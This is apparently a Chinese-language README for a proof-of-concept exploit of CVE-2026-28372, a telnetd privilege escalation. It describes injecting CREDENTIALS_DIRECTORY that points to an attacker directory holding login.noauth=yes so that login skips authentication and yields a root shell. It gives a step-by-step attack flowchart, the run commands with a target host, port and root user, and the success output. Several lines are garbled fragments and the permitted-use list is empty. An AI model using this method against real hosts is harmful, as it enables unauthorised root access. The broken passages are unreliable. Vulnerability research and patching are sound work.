
Mohammed Idrees Banyamer
约旦 🇯🇴
Instagram: @banyamer_security
安全研究员 | 进攻性安全 | 漏洞利用开发
CVE‑2026‑28372 — GNU inetutils telnetd 通过 CREDENTIALS_DIRECTORY + login.noauth 实现权限提升
本概念验证(PoC)演示了 GNU inetutils telnetd 中的一个本地权限提升漏洞。
telnetd 错误地将客户端控制的环境变量传递给 login(1)。
通过设置:
CREDENTIALS_DIRECTORY=<攻击者目录>
并放置:
login.noauth = yes
即可绕过身份验证,从而可能无需密码即可获得 root shell。
login.noauth 的 util-linux 版本telnetd → login(1) 环境变量信任问题。
yes 的 login.noauth 文件login 读取攻击者控制的凭据目录flowchart TD
A[非特权用户] --> B[创建伪造凭据目录]
B --> C[放置 login.noauth = yes]
C --> D[连接到 telnetd]
D --> E[注入环境变量]
E --> F[设置 CREDENTIALS_DIRECTORY]
F --> G[telnetd 调用 login]
G --> H[login 读取 login.noauth]
H --> I[身份验证绕过]
I --> J[获得 root shell]
python3 cve-2026-28372.py
可选参数:
python3 cve-2026-28372.py --host 127.0.0.1 --port 23 --user root
✔ 创建攻击者控制的凭据目录
✔ 生成 login.noauth 绕过文件
✔ 连接到 telnetd
✔ 注入恶意环境变量
✔ 尝试身份验证绕过
unsetenv("CREDENTIALS_DIRECTORY")
/bin/login 或 /usr/bin/login本 PoC 仅用于:
禁止未经授权的使用。
PoC 研究者:
Mohammed Idrees Banyamer banyamer_security